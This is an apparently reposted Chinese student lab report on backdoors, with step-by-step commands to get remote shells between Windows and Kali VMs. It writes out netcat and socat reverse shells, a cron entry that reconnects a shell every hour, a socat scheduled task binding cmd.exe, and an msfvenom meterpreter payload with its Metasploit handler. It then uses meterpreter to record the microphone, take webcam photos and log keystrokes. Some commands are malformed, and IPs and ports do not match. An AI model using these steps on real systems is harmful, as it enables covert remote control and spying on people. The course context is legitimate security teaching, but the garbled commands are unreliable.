20174315黄华健《网络对抗技术》Exp2 后门原理与实践
Posted hhj20174315
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了20174315黄华健《网络对抗技术》Exp2 后门原理与实践相关的知识,希望对你有一定的参考价值。
1 实验目标
1.1 实验要求
- 使用nc实现win,mac,Linux间的后门连接
- meterpreter的应用
- MSF POST 模块的应用
1.2 实验内容
- 使用netcat获取主机操作Shell,cron启动 。
- 使用socat获取主机操作Shell, 任务计划启动 。
- 使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell。
- 使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 。
- 使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。
三、实验步骤及结果
(一)ncat
netcat是一个底层工具,进行基本的TCP、UDP数据收发。常被与其他工具结合使用,起到后门的作用。Linux一般自带netcat,"man netcat"或"man nc"可查看其使用说明。
Windows中安装ncat,在 课程主页附件中下载ncat.rar解压即可使用。这里笔者下载解压到D盘上。
1.Win获得Linux Shell
先查看一下windows端的IP地址(ipconfig)。
在windows中下载好netcat后,切换到文件目录,用 ncat.exe -l -p 4315 命令打开监听。
接下来打开Kali,用nc 192.168.1.49 4315 -e /bin/sh 指令来进行反弹式连接。
过一会在Windows用ncat.exe -l -p 4320 命令打开,发现已经获得了Linux的shell,可以运行任何的指令。(在这里我用ls作为示例)
2.1.2 Linux获得Win Shell
既然我们的windows可以获取Linux的shell,那当然反过来也成立。
首先,我们要知道虚拟机的IP地址,这里用ipconfig来查看
在Linux端运行监听指令 nc -l -p 4315,然后就在windows上进行反弹连接 ncat.exe -e cmd.exe 192.168.54.128 4315。
这样一来,Linux就获得了windows的shell。
可以看到命令行界面,还可以执行windows的命令(我用ipconfig为示例)
2.1.3 nc传输数据
windows运行监听指令
linux与windows建立连接;
连接建立成功后,可以进行字符数据的传输了
2.2 Meterpreter
Meterpreter是一个用来生成后门程序的平台,具有强大的功能,特别是其socks代理,简直就是内网渗透测试神器。
后门就是一个程序。
传统的理解是:有人编写一个后门程序,大家拿来用。
后来有一些牛人呢,就想编写一个平台能生成后门程序。这个平台呢,把后门的基本功能、扩展功能、编码功能、运行平台以及运行参数,全都做成零件或可调整的参数。用的时候按需要组合,就可以生成一个可执行文件。
典型的平台就包括有:
- intersect
- Metaspolit的msfvenom指令
- Veil-evasion
任务一:使用netcat获取主机操作Shell,cron启动
Cron是Linux下的定时任务,每一分钟运行一次,根据配置文件执行预设的指令。
1.在windows中开启监听,使用 ncat.exe -l 4315 命令监听4315
端口
2.crontab指令增加一条定时任务,"-e"表示编辑。并选择编辑器3,在底行插入10 * * * * /bin/netcat 192.168.1.156 4315 -e /bin/sh,即在每个小时的第10分钟反向连接主机的4315
端口。
3.保存、退出后配置即生效。可以通过"crontab -l"来查看,"-l"表示list。10分钟后执行指令,可以发现已经获得了shell。
任务二:使用socat获取主机操作Shell, 任务计划启动
1.把张博同学发给我的socat压缩包下载下来并解压好。
2.在Windows系统下,打开控制面板->系统和安全->管理工具找到任务计划程序,点击创建任务。
3.点击触发器选项卡,选择新建,然后将开始任务设置为工作站锁定时。
4.在操作选项卡,点击新建,在“程序或脚本”中选择socat.exe文件的路径,添加参数中填写tcp-listen:4315 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口4315,同时把cmd.exe的stderr重定向到stdout上;
5.创建完成之后,键入windows+L锁定计算机再次登录,让任务开始执行。点击任务计划程序库,可以看见这个被我命名为4315的计划正在运行。
6.然后在Kali环境下输入指令 socat -tcp:192.168.1.156:4320,可以发现已经获得了cmd的shell,看到了命令行界面(使用了ipconfig来验证)。
任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
1.生成4320_backdoor.exe,复制到Win。
在Kali中输入命令如下(由于是在Linux中生成后门,所以此处的ip地址是Kali的ip地址)kali的ip地址如下
msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1=4315 -f exe > 4315_backdoor.exe
2.在Windows下执行 ncat.exe -l 4315 > 4315_backdoor.exe,使被控主机进入接收文件模式。
3.在kali中执行nc 192.168.1.49 4315 < 4315_backdoor.exe,将生成的后门程序传送到主机上。
4.MSF打开监听进程。
Kali中重新打开一个终端,输入msfconsole
进入msf控制台
依次输入:
-
use exploit/multi/handler
//使用监听模块,设置payload -
set payload windows/meterpreter/reverse_tcp
//使用与生成后门程序时相同的payload -
set LHOST 192.168.171.128
-
set LPORT 4320
-
exploit
//设置完成,开始监听 -
任务四:使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权;
1.音频
保持任务三的状态,输入 record_mic 可以截获一段音频。
2、摄像头
输入指令webcam_snap 使用摄像头拍照。
3、击键记录
使用keyscan_start
指令记录下击键的过程,keyscan_dump
指令读取击键记录
3 实验思考与心得
3.1 基础问题回答
(1)例举你能想到的一个后门进入到你系统中的可能方式?
浏览网站所附带的软件,或者在不正规的下载网站下载软件
(2)例举你知道的后门如何启动起来(win及linux)的方式?
windows:自启动。 linux:输入shellcode。
(3)Meterpreter有哪些给你映像深刻的功能?
可以通过反向链接,获取所有执行了含后门的可执行文件的主机shell操作权,从而得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息等等。
(4)如何发现自己有系统有没有被安装后门?
查看开机自启动项、任务计划程序中是否有可疑程序;安装专门的杀毒软件,实时防护;查看本机端口,判断是否有被异常开放的端口等等。
2、实验体会
这次实验趣味性很强,通过学习老师教程以及学长学姐的博客,基本都能够完成实验。在这次实验中,我学会了利用后门程序对主机进行注入攻击,学会了使用netcat、socat、meterpreter等,虽然内容简单,但我已经基本了解后门的基本原理。在今后的学习中,我将会进一步深入研究后门的各种理论知识。
本次实验也让我更加了解了一些网络攻击的手段,加强了网络安全防范意识。
2、实验遇到的问题
问题1:kali没有联网
实验开始时启动Kali之后,莫名其妙发现连不上网,通过与同班同学的交流得到解决方法,最后在他的指导下通过虚拟网络编辑器还原默认设置之后,重启KALI成功连上网。
问题2:多个程序使用导致失败
解决方法:最简单的推到重做,捂脸.JPG。
问题3:kali没装有socat
我的共享文件夹不知道咋的用不了,网上找发现和自己的情况也不一致。
最后的解决办法:把socat压缩包放到我的邮箱,然后在kali的搜狐浏览器登录邮箱下载(土办法,捂脸.jpg)
以上是关于20174315黄华健《网络对抗技术》Exp2 后门原理与实践的主要内容,如果未能解决你的问题,请参考以下文章
2019-2020-2 20175303柴轩达 《网络对抗技术》Exp2 后门原理与实践